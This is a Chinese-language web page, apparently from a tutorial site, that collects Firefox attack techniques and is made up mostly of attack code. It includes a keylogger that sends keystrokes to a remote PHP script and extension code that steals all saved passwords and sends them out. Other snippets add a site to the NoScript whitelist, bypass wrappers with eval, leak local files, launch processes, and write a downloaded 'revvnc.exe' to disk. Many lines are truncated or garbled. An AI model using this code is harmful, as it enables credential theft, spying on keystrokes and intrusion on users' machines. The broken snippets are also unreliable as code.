浏览器Firefox下攻击技巧总结漏洞预警 -电脑资料
一、Key Logger
// 先在Mozilla Firefox中用addEventListener为keypress事件注册一个事件处理程序,这里为onkey函数,以此实现键盘记录功能,
浏览器Firefox下攻击技巧总结漏洞预警
。
document.addEventListener(\"keypress\
var keys='';
function onkey(e){
keyss += String.fromCharCode(e.charCode); // 将按键码转换为字符if (keys.length>20){
// 利用XMLHTTP请求向远程网站发送记录下的按键字符
http=new XMLHttpRequest;
url = \"http:///prasannak/ler.php?keylog=\"+keyss+\"\\n\";
http.open(\"GET\
http.send(null);
keyss='';
}
}
二、No-Script. Bypass
利用XPCOM(跨平台组件对象模型)中的类和组件来向将恶意站点添加到no-script白名单中,以此绕过no-script插件的保护。
// 其中let关键字只在Firefox或者其它基于mozilla的浏览器中有效,它代表着类似局部变量的意义,具体可参考这里:
// /en/New_in_JavaScript_1.7#let_statement
let Sub_btn = {
onCommand: function(event) {
// 创建preferences-service实例
var perfs =
Components.classes[\"/preferences-service;1\"].
getService(Components.interfaces.nsIPrefService);
// 获取“capability.policy.maonoscript.”子分支
perfs = perfs.getBranch(\"capability.policy.maonoscript.\");
//向no-script白名单中添加恶意站点
perfs.setCharPref(\"sites\
}
}
三、Password Stealer
利用XPCOM来获取LoginManager中记录的登陆信息,以截取用户的登陆密码。
let HelloWorld = {
onCommand: function(event) {
// 创建login-manager实例
var l2m =
Components.classes[\"/login-manager;1\"].
getService(Components.interfaces.nsILoginManager);
// 获取所有被登陆管理器记录的信息
alltheinfo = l2m.getAllLogins({});
for (i=0; I<=alltheinfo.length; i=i+1){
window.open('/?'
+ unescape(alltheinfo[i].hostname) + '.'
+ unescape(alltheinfo[i].username) + '.'
+ unescape(alltheinfo[i].password));
}
}
} ;
四、攻击DOM与事件句柄
Extension XUL Code
Malicious Web Location Code
This Test Page
五、Bypassing Wrappers
Extension Code
function Test_Function
{
test = my_message
if (test==null)
{
alert(\"Wrapper Exists\")
}
else{
alert(test);
trim =
window.content.wrappedJSObject.my_message1
eval(trim);
}
}
Malicious Website Code
This Test Page
六、本地文件访问
var fileToRead=”file:///C:/boot.ini”;
var fileContents=document.ReadURL.readFile(fileToRead);
setTimeout(“”,100);
var remoteLocation=”/” + unescape(fileContents);
document.location=remoteLocation;
七、远程代码执行
var lFile = Components.classes[\"/file/local;1\"].
createInstance(Components.interfaces.nsILocalFile);
var lPath = \"/usr/bin/gnome-terminal\";
lFile.initWithPath(lPath);
var process = Components.classes[\"/process/util;1\"].
createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
process.run(false,'','');
八、写文件系统
var xmlhttp;
function loadXMLDoc(url){
xmlhttp=new XMLHttpRequest;
xmlhttp.open(\"GET\
xmlhttp.overrideMimeType('text/plain; charset=x-user-defined');
xmlhttp.send(null);
if (xmlhttp.status==200){
setTimeout(\"\
makefile(xmlhttp.responseText);
}
}
function makefile(bdata){
var getWorkingDir= Components.classes[\"/file/directory_service;1\"].
getService(Components.interfaces.nsIProperties).
get(\"Home\
var aFile = Components.classes[\"/file/local;1\"].
createInstance(Components.interfaces.nsILocalFile);
aFile.initWithPath( getWorkingDir.path + \"\\\\revvnc.exe\" );
aFile.createUnique( Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 777);
var stream = Components.classes[\"/network/safe-file-output-stream;1\"].
createInstance(Components.interfaces.nsIFileOutputStream);
stream.init(aFile, 0x04 | 0x08 | 0x20, 0777, 0);
stream.write(bdata, bdata.length);
if (stream instanceof Components.interfaces.nsISafeOutputStream){
stream.finish;
} else{
stream.close;
}
}
